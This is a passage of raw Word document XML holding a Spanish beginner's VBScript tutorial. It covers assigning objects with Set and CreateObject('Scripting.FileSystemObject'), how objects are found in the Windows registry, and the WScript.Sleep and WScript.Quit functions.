          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y dic las de</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scripting.Dictionary.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hasta ahí tan solo es aprender una nueva función. Pero vemos algo más, vemos un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por ahí que no sabemos muy bien que hace, pues hasta ahora nos servía sin el. La razón de poner </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> fso = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"Scripting.FileSystemObject")</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y no </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">fso = CreateObject ("Scripting.FileSystemObject"), </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">como habíamos hecho hasta ahora reside en el tipo de valor que le damos a la variable. La variable utilizada para la función CreateObject, no recibe ningún valor conocido hasta ahora: recibe un valor binario, y para indicar eso debemos poner ese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delante. Y eso es todo para copiar un objeto a una variable.</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Ya sabemos realizar el primer paso, pero solo con eso no tenemos nada. Debemos aprender a utilizar los objetos. Y para eso, nada mejor que un ejemplo teóric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Codigo del scrip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fso.función</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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roofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ws.función</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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hecho de que sea un ejemplo teórico es que aún no he enseñado ninguna de las funciones que estos objetos poseen, así que más vale verlo, por el momento así. Lo que hay es muy simple: al principio copiamos a dos variables dos objetos, luego tenemos nuestro script, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">hasta que en un momento determinado necesitamos usar esas funciones. Como a casi todas las funciones, se les </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>asigna una Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que recibe el valor resultante de la función; y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>poseen X argumentos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que varían de unas a otras. Lo único que hay que destacar es que por ejemplo si la función se llama </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">pintar, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">no pondremos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Variable = pintar(argumentos)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, sino </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Variable = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso.pintar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(argumentos),</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pues como he explicado </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es la variable fso</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (o ws si se diera el caso) </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>quien tiene la función</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (porque la ha copiado del objeto). Por supuesto cada Objeto tiene sus propias funciones que son diferentes entre si.</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empre me gusta llegar hasta el fondo de la cuestión, así que voy a explicar como el script encuentra al Objeto (que nosotros no sabemos donde esta). En este momento recomiendo que si no sabes que es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el registro de Windows (regedit.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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 xml:space="preserve"> te informes antes de continuar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2090"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2838450" cy="1799590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5013" name="Picture 5013"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="5013" name="Picture 5013"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2838450" cy="179959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l esquema vemos el proceso más o menos simple que sigue, y yo especifico que en el paso 2 y 4 donde busca es en la rama </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Si echáis un vistazo veréis la barbaridad de objetos que existen, la mayoría de los cuales son privados de programas y no pueden utilizarse para programar. Por otro </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lado</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> antes comente que los objetos son </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>archivos acabado es “.ocx”</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero si hacéis la prueba con estos tres objetos veréis que son dll. Esto se debe a que realmente estos objetos son Librerias que han sido adaptadas a VBScript simulando que son objetos, aparte que fueron de las primeras que se hicieron y por tanto aún no se diferenciaban del todo. Aún así funcionan a la perfección y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">vienen de serie </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>con todos los Windows hasta la fech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pues, antes de dar por finalizada la introducción y pasar ya a la practica, he de introducir aquí una excepción con un objeto que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>solo se puede usar en VBScript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (yno en VB6, es el único), y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>no requiere copiarlo a una variable</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pues se trata del objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScrip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lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en definitiva, darle ordenes al interprete que usamos. Si bien, nos servirá para ver ejemplos sencillos de uso antes de empezar con lo fuerte, además de que interesantes de verdad este objeto solo tiene dos funciones.</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Sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función no requiere declarar ningún objeto simplemente porque el objeto que usa es el propio </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función se encarga de realizar una pausa en la ejecución del script durante el tiempo en milisegundos que le indiquemos (parando obviamente al intérprete). De esa forma podemos hacer una pausa entre dos MsgBox o </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>darle tiempo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a los comandos que lo requieren. Se utiliza como muestra el ejemplo siguiente, que pausaría la ejecución un segundo:</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WScript.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Sleep </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1000</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mos utilizamos la variable autodefinida </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Wscript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> seguido de un punto y la función (su nombre) y a continuación un argumento numérico que expresa tiempo en milisegundos. Podemos ver como no se le ha asignado a la función ninguna variable, ya que no devuelve ningún valor, simplemente para el tiempo y ya. Es necesario hacer mención (brevemente) ya a la diferencia entre asignar una variable a una función y no hacerl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Me llamo Juanda”</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Msgbox </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Me llamo Juanda”</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>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a es la función MsgBox, en el primer caso sin que le asignemos una variable (en tal caso el valor se pierde), y en el segundo, asignándole la variable, en la que recogemos el valor dado. Como podemos ver, la diferencia radica en que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">si no asignamos variable </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">debemos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>suprimir los paréntesis</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, nada más. Por otro lado, seguro que os habréis dado cuenta que muchas funciones (como Msgbox) pueden omitírseles varios argumentos. De hecho, en este ejemplo solo le ponemos uno. Para saber de que funciones que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>campos son omisible</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">s consulta alguna Referencia de Funciones de VBScript. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pero</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en definitiva, no es nada importante, tan solo cuestión de detalles que pueden hacer que un código sea menos limpio y hecho más rápid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Pero continuemos con lo nuestro,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la segunda función</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Quit</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función no requiere declarar ningún objeto simplemente porque el objeto que usa es WScript. Esta función se encarga de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>finalizar la ejecución del script enviando el código de error que le indiquemos (si el numero del error no existe no se enviara error). De esa forma podemos f</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>inalizar el script cuando se cumpla una condición</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> determinada sin preocuparnos si hay más código o no a continuación. La </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>funcion Quit</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiene la sintaxis siguiente:</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WScript.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Quit</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(1)</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eso es todo en lo que a excepciones fuertes en objetos se refiere. Son en definitiva dos funciones que puede llegar a resultar bastante útiles, no lo olvidemos. Por otro lado, a partir de ahora he de decir que voy a mostrar los objetos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Scripting.FileSystemObject </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
